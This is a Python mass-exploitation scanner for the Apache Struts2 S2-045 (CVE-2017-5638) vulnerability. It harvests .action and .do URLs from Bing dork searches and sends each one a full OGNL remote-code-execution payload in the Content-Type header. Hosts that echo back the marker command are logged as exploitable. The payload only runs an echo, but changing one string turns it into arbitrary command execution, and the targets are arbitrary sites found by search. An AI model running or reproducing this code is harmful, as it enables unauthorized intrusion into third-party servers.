# encoding:utf-8
import sys
import requests
from bs4 import BeautifulSoup
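
# PoC scanner for Apache Struts2 S2-045 (CVE-2017-5638): searches Bing using
# the dorks listed in keyword.txt, collects .action/.do endpoints from the
# results, and sends each one a harmless `echo` marker payload via the
# Content-Type header to test whether it is exploitable.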
keyword = {}
with open("keyword.txt") as f:
    for i, keywordLine in enumerate(f):
        keyword[str(i)] = keywordLine.strip()
usage = '''
usage: python s2-045.py <keyword index> <page count>
  e.g. python s2-045.py 0 10
  first argument  - index (from keyword.txt) of the dork to search Bing with
  second argument - number of Bing result pages to crawl
'''

def poc(actionURL):
    # Minimal multipart body. The exploit itself travels in the Content-Type
    # header below, so this body is essentially a placeholder. The original
    # used backslash line continuations, which silently dropped the newlines;
    # it is rebuilt here with explicit CRLFs.
    data = ('--447635f88b584ab6b8d9c17d04d79918\r\n'
            'Content-Disposition: form-data; name="image1"\r\n'
            'Content-Type: text/plain; charset=utf-8\r\n'
            '\r\n'
            'x\r\n'
            '--447635f88b584ab6b8d9c17d04d79918--')
    # S2-045: the Jakarta multipart parser evaluates OGNL embedded in the
    # Content-Type header. The payload runs `echo hereisaexp` and copies the
    # command output into the HTTP response, which main() then checks for.
    # The hardcoded "Content-Length: 155" did not match the body and has been
    # dropped; requests computes the correct value itself.
    header = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo hereisaexp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
    }
    try:
        request = requests.post(actionURL, data=data, headers=header, timeout=10)
    except requests.RequestException:
        return "None", "Refused"
    return request.text, request.status_code

def returnURLList():
    # Page through Bing results for the chosen keyword and yield, per result
    # page, a list of candidate Struts endpoints ("first" is Bing's offset).
    keywordsBaseURL = 'http://cn.bing.com/search?q=' + keyword[sys.argv[1]] + '&first='
    n = 0
    i = 1
    while n < int(sys.argv[2]):
        baseURL = keywordsBaseURL + str(i)
        # Advance before fetching so a failing page is skipped rather than
        # retried forever (the original `continue` never incremented i or n).
        i += 10
        n += 1
        try:
            req = requests.get(baseURL)
            soup = BeautifulSoup(req.text, "html.parser")
            text = soup.select('li.b_algo > h2 > a')
            # Trim each result URL down to its .action/.do endpoint.
            if '.action' in keyword[sys.argv[1]]:
                standardURL = [url['href'][:url['href'].index('.action')] + '.action'
                               for url in text if '.action' in url['href']]
            elif '.do' in keyword[sys.argv[1]]:
                standardURL = [url['href'][:url['href'].index('.do')] + '.do'
                               for url in text if '.do' in url['href']]
            else:
                standardURL = [url['href'] for url in text]
        except Exception:
            print("HTTPERROR")
            continue
        yield standardURL

def main():
    if len(sys.argv) != 3:
        # Wrong argument count: show usage plus the available keyword indexes.
        print(usage)
        for k, v in keyword.items():
            print("%s is %s" % (k, v))
        sys.exit()
    for urlList in returnURLList():
        for actionURL in urlList:
            text, code = poc(actionURL)
            if 'hereisaexp' in text:
                # The echoed marker came back in the response, so the target
                # executed the command; record it as vulnerable.
                print(str(code) + "----Successful----" + actionURL + '\n')
                with open("AvailableURL.txt", "a") as f:
                    f.write(actionURL + '\n')
            else:
                print(str(code) + '----' + actionURL + '\n')


if __name__ == '__main__':
    main()